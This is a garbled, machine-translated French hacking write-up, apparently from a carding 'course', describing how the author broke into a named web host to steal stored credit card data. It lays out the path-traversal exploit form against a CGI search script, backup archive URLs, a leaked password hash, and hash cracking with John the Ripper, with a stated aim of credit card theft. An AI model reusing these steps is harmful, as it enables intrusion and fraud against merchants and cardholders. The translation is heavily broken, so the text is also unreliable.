Nous continuons notre série de cours pour obtenir des cartes de crédit.
ssl.adgrafix.com des ressources est un dépôt de centaines de petits magasins en ligne américains.
Passez devant ce fait était pas.
Plus que je trouve sur ce script de recherche de buggy serveur qui vous permet de visualiser tous les fichiers sur le serveur avec les privilèges du serveur.
A propos de la vulnérabilité de détails regarder ici: http://www.lwb57.org/advisories/?adv=12
Mais mon but était un meilleur accès aux yuzersky cartes de crédit hranilitsam.
Incite la base de samopisnaya serveur DCS, après un certain temps , je vis que le répertoire / utilisateurs / ouverts pour voir, il y avait des utilisateurs dossier naturellement soumis à autorisation.
Mais à part ça, il a immédiatement jeter les dossiers de plusieurs archives de sauvegarde soient disponibles en téléchargement:
http://ssl.adgrafix.com/users/cedarsinn-secure.tar
http://ssl.adgrafix.com/users/diamonds-secure.tar
http://ssl.adgrafix.com/users/heavymetal-secure.tar
etc.
Leur contenu n'a été trouvé carte de crédit, mais le plus gros était de trouver le fichier .htaccess comme suit:
AuthUserFile / opt / home2 / adgrafix / securedir / heavymetalpw AuthGroupFile / dev / null
AuthName "Secure System Data Retrieval"
AuthType Basic
<Limit GET POST>
exiger utilisateur heavymetal
</ Limit>
Attention , immédiatement attiré le fichier avec un heavymetalpw de mot de passe, et plus important encore , il a été établi le chemin devant lui.
Il est resté dans l'exploit d'ajouter ce chemin, et je me suis le mot de passe de l'utilisateur:
<Form method = action POST = " http://ssl.adgrafix.com/cgi-bin/wsmsearch2.cgi"> <B> <FONT FACE = " Arial, Helvetica"> <font size = -1> Rechercher sur le site: </ FONT> </ FONT> <br> </ B> <Input type = text name = " la taille des termes" = 20>
<Input type = hidden name = booléen value = "ET"> <Input type = hidden name = cas value = "Insensitive"> <Input type = hidden name = quicksearch value = "NO"> <Input type = hidden name = max value = " 50">
<Input type = hidden name = faqfile value = "/"> <Input type = name = RésultatsPage caché value = "/ opt / home2 / adgrafix / securedir / heavymetalpw"> <Input type = soumettre value = " Rechercher!">
Vous appelez ce script à partir d' un domaine qui ne soit pas inscrit sur Adgrafix Content - type: text / html heavymetal : bcroman .vGqzyBep5EDE: 1b8HaV7PCqZc.
D' ailleurs , j'avais déjà une liste d'utilisateurs de cette ressource, obtenue avec le même script,
qui était juste assez pour entrer le nom d'un utilisateur existant:
http://ssl.adgrafix.com/ssl_adgrafix_user_list.txt
Bien sûr , il serait possible de prendre les connexions des utilisateurs du dossier / utilisateurs /, mais si le moteur de recherche était très gentil et m'a donné immédiatement une liste de noms d'utilisateurs, je décide de ne pas fatiguer.
Deux heures plus tard , je réunis tous les logins / mots de passe et l' a nourri john'u, et en trois jours je l' ai déjà eu accès au crédit de stockage demi-yuzerkih.
Votre bug Durito.
_________________
MANGER LES RICHES!
|
Commentaires
Commentant, gardez à l' esprit que le contenu et le ton de vos messages peuvent blesser les sentiments des gens réels, montrer du respect et de la tolérance à ses interlocuteurs, même si vous ne partagez pas leur avis, votre comportement en termes de liberté d'expression et de l' anonymat offert par Internet, est en train de changer non seulement virtuel, mais dans le monde réel. Tous les commentaires sont cachés à l'index, le contrôle anti - spam.